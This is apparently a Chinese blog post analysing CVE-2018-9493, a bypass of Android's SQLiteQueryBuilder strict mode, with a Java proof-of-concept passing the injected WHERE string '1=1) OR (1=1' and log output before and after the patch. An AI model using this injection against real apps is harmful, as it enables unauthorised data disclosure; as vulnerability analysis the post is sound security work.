SQLiteQueryBuilder 与 CVE-2018-9493

安全隐患(SQL注入导致数据泄露):http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9493

 

SQLiteQueryBuilder是Android中用来构建复杂查询SQL的类,在开启安全检查(android.database.sqlite.SQLiteQueryBuilder.setStrict())后会对SQL的Where条件添加额外的“()”以防止恶意SQL注入。

其工作的思路很简单,用加了额外“()”的SQL来编译(prepare()),如果编译顺利(没有语法错),就接着编译、执行原始SQL以获取数据结果。

但是这个思路有个缺陷,如果攻击者有机会恶意拼接Where条件,用类似“1=1) OR (1=1”这样的输入,因为输入中也包含了“()”,可以让开启setStrict后的两种SQL均编译顺利通过,但是Where条件的含义却被篡改了。

 

验证程序:

    private void testQueryBuilder() {
        Log.i(TAG,"Begin testQueryBuilder...");
        android.database.sqlite.SQLiteDatabase         adb = android.database.sqlite.SQLiteDatabase.openOrCreateDatabase("/data/data/just.justdbdemo/t.db", null);
        android.database.sqlite.SQLiteQueryBuilder     sqb = new android.database.sqlite.SQLiteQueryBuilder();
        sqb.setTables("sqlite_master");
        sqb.setStrict(true);
        sqb.appendWhere("sql !='sql'");
        Cursor csr = sqb.query(adb, new String[]{"name, sql"}, "1=1) OR (1=1", null, null, null, null);
        Log.i(TAG, "csr.getCount() = " + csr.getCount());
        csr.close();
        adb.close();
        Log.i(TAG,"End of testQueryBuilder...");
    }

输出结果:

android.database.sqlite.SQLiteQueryBuilder.setStrict(false);

01-07 13:25:25.465: D/SQLiteConnection(1149): prepare took 1ms - succeeded, sql="SELECT name, sql FROM sqlite_master WHERE (sql !='sql') AND (1=1) OR (1=1)"
01-07 13:25:25.475: D/SQLiteConnection(1149): executeForCursorWindow took 2ms - succeeded, sql="SELECT name, sql FROM sqlite_master WHERE (sql !='sql') AND (1=1) OR (1=1)", window='/data/data/just.justdbdemo/t.db {2a150a58}', startPos=0, actualPos=0, filledRows=1, countedRows=1
01-07 13:25:25.475: I/Just DB test(1149): csr.getCount() = 1

----------------------------------------------------------------------------------------------------- android.
database.sqlite.SQLiteQueryBuilder.setStrict(true); 01-07 13:27:06.645: D/SQLiteConnection(1199): prepare took 1ms - succeeded, sql="SELECT name, sql FROM sqlite_master WHERE (sql !='sql') AND ((1=1) OR (1=1))" 01-07 13:27:06.645: D/SQLiteConnection(1199): prepare took 3ms - succeeded, sql="SELECT name, sql FROM sqlite_master WHERE (sql !='sql') AND (1=1) OR (1=1)" 01-07 13:27:06.655: D/SQLiteConnection(1199): executeForCursorWindow took 1ms - succeeded, sql="SELECT name, sql FROM sqlite_master WHERE (sql !='sql') AND (1=1) OR (1=1)", window='/data/data/just.justdbdemo/t.db {2a147798}', startPos=0, actualPos=0, filledRows=1, countedRows=1 01-07 13:27:06.655: I/Just DB test(1199): csr.getCount() = 1 打上补丁之后 01-07 13:28:30.135: D/SQLiteConnection(1199): prepare took 1ms - succeeded, sql="SELECT name, sql FROM sqlite_master WHERE (sql !='sql') AND ((1=1) OR (1=1))" 01-07 13:28:30.165: D/SQLiteConnection(1199): prepare took 2ms - succeeded, sql="SELECT name, sql FROM sqlite_master WHERE (sql !='sql') AND (1=1) OR (1=1)" 01-07 13:28:30.195: D/SQLiteConnection(1199): executeForCursorWindow took 1ms - succeeded, sql="SELECT name, sql FROM sqlite_master WHERE (sql !='sql') AND ((1=1) OR (1=1))", window='/data/data/just.justdbdemo/t.db {2a155a58}', startPos=0, actualPos=0, filledRows=0, countedRows=0 01-07 13:28:30.195: I/Just DB test(1199): csr.getCount() = 0

 

posted @ 2019-01-07 21:50  seebigsea  阅读(900)  评论(1编辑  收藏  举报